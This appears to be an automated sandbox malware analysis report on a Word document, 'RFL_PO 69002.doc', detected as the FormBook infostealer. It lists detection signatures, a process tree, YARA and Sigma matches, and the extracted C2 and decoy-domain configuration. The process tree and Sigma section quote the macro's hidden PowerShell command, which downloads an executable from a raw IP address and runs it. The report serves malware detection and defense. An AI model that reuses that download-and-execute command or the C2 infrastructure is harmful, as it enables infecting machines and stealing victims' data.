Play interactive tour

Edit tour

Analysis Report RFL_PO 69002.doc

Overview

General Information

Sample Name:	RFL_PO 69002.doc
Analysis ID:	433026
MD5:	ee4431e2c986dcac3fc8078c674ba65e
SHA1:	64aa75122963e38f52739ba819788e4bfcfb3651
SHA256:	4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (process start blacklist hit)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected Costura Assembly Loader

Abnormal high CPU Usage

Allocates a big amount of memory (probably used for heap spraying)

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Non Interactive PowerShell

Sigma detected: Suspicious Bitsadmin Job via PowerShell

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 3664 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

powershell.exe (PID: 4220 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nothinglittle.exe (PID: 6988 cmdline: C:\Users\Public\Documents\nothinglittle.exe MD5: 3C88C6EF1A906BC81FC6B5B7FC478E0C)

nothinglittle.exe (PID: 6172 cmdline: C:\Users\user\AppData\Local\Temp\nothinglittle.exe MD5: 3C88C6EF1A906BC81FC6B5B7FC478E0C)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bucksnortneola.com/gw2/"], "decoy": ["kmampc.com", "swagsoldier.com", "achochapo.com", "nestymentemaestra.com", "rakuen-beans.info", "portaldainsolvencia.com", "nationaltodaytv.com", "monadiclab.com", "thebudgetfurnituredenver.com", "sifangzhouzi.com", "quangcaosonthach.com", "cbluebeltliveshop.com", "hyperrealmarketing.com", "dallasproducecompany.com", "zizhizhengshu.com", "becosyshe.com", "injectionhub.com", "wasteshelter.com", "gapegod.com", "danfrem.com", "emag.enterprises", "insomniaut.com", "margaretsboutiquenb.com", "bestmovies4k.com", "hsxytz.com", "veles.asia", "graphicoustic.com", "rzeroxi.com", "cristyleebennett.com", "vercoicsporno.club", "awdworldwide.com", "agrilast.com", "vineyardplaceseniorliving.com", "blancaholidaylets.com", "didixun.com", "localmiller.com", "gravityphysiotherapy.com", "couchtabledesktop.com", "cypresswoodsseniorliving.com", "mmdastro.com", "opportunitybsi.com", "deejspeaks.com", "alllivesmattertojesus.info", "clippingpathmask.com", "tuoitrechuatraisudoi.site", "mipecheritage.info", "acadeopolis.com", "52jnh.com", "thetrust.place", "highseachartersct.com", "booklarge.com", "kela-de.com", "ea-it-pantomath.com", "tricountyrr.com", "blackeye.online", "hidrovaco.com", "sleeplessreconnaissance.life", "newalbanyironworks.com", "scthxb.com", "bossssss.com", "isaostar.com", "pointredeem.com", "myfulfillmentproject.com", "toikawai.com"]}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000003.269897366.00000246F5519000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7cd58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7cfd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x88af5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x885e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x88bf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x88d6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7d9ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8785c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7e6e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x8e797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x8f79a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8b879:$sqlite3step: 68 34 1C 7B E1 0x8b98c:$sqlite3step: 68 34 1C 7B E1 0x8b8a8:$sqlite3text: 68 38 2A 90 C5 0x8b9cd:$sqlite3text: 68 38 2A 90 C5 0x8b8bb:$sqlite3blob: 68 53 D8 7F 8C 0x8b9e3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.275702172.0000000000D12000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9a50:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9cca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157ed:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158ef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a67:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14554:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3db:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b48f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c492:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18571:$sqlite3step: 68 34 1C 7B E1 0x18684:$sqlite3step: 68 34 1C 7B E1 0x185a0:$sqlite3text: 68 38 2A 90 C5 0x186c5:$sqlite3text: 68 38 2A 90 C5 0x185b3:$sqlite3blob: 68 53 D8 7F 8C 0x186db:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000000.431614413.00000000007D2000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001C.00000002.491282271.00000000007D2000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000003.269964305.00000246F5559000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x932a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5409:$sqlite3step: 68 34 1C 7B E1 0x551c:$sqlite3step: 68 34 1C 7B E1 0x5438:$sqlite3text: 68 38 2A 90 C5 0x555d:$sqlite3text: 68 38 2A 90 C5 0x544b:$sqlite3blob: 68 53 D8 7F 8C 0x5573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.432793873.0000000000D12000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x932a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5409:$sqlite3step: 68 34 1C 7B E1 0x551c:$sqlite3step: 68 34 1C 7B E1 0x5438:$sqlite3text: 68 38 2A 90 C5 0x555d:$sqlite3text: 68 38 2A 90 C5 0x544b:$sqlite3blob: 68 53 D8 7F 8C 0x5573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000003.270059630.00000246F555A000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000003.430227602.0000000001416000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2ba10:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2bc8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x53a30:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x53caa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x377ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5f7cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x37299:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x5f2b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x378af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5f8cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x37a27:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5fa47:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2c6a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x546c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x36514:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x5e534:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2d39b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x553bb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3d44f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x6546f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x3e452:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3a531:$sqlite3step: 68 34 1C 7B E1 0x3a644:$sqlite3step: 68 34 1C 7B E1 0x62551:$sqlite3step: 68 34 1C 7B E1 0x62664:$sqlite3step: 68 34 1C 7B E1 0x3a560:$sqlite3text: 68 38 2A 90 C5 0x3a685:$sqlite3text: 68 38 2A 90 C5 0x62580:$sqlite3text: 68 38 2A 90 C5 0x626a5:$sqlite3text: 68 38 2A 90 C5 0x3a573:$sqlite3blob: 68 53 D8 7F 8C 0x3a69b:$sqlite3blob: 68 53 D8 7F 8C 0x62593:$sqlite3blob: 68 53 D8 7F 8C 0x626bb:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000000.432322254.00000000007D2000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: nothinglittle.exe PID: 6988	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: nothinglittle.exe PID: 6172	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.nothinglittle.exe.d10000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.0.nothinglittle.exe.d10000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
28.2.nothinglittle.exe.7d0000.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
28.0.nothinglittle.exe.7d0000.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.nothinglittle.exe.423b160.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.nothinglittle.exe.423b160.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7cbf8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ce72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x88995:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x88481:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x88a97:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x88c0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7d88a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x876fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7e583:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x8e637:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x8f63a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.nothinglittle.exe.423b160.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8b719:$sqlite3step: 68 34 1C 7B E1 0x8b82c:$sqlite3step: 68 34 1C 7B E1 0x8b748:$sqlite3text: 68 38 2A 90 C5 0x8b86d:$sqlite3text: 68 38 2A 90 C5 0x8b75b:$sqlite3blob: 68 53 D8 7F 8C 0x8b883:$sqlite3blob: 68 53 D8 7F 8C
28.2.nothinglittle.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
28.2.nothinglittle.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
28.2.nothinglittle.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
28.0.nothinglittle.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
28.0.nothinglittle.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
28.0.nothinglittle.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
28.0.nothinglittle.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
28.0.nothinglittle.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
28.0.nothinglittle.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
28.0.nothinglittle.exe.7d0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
28.2.nothinglittle.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
28.2.nothinglittle.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
28.2.nothinglittle.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Sigma Overview

System Summary:

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\Documents\nothinglittle.exe, CommandLine: C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\nothinglittle.exe, NewProcessName: C:\Users\Public\Documents\nothinglittle.exe, OriginalFileName: C:\Users\Public\Documents\nothinglittle.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4220, ProcessCommandLine: C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 6988

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

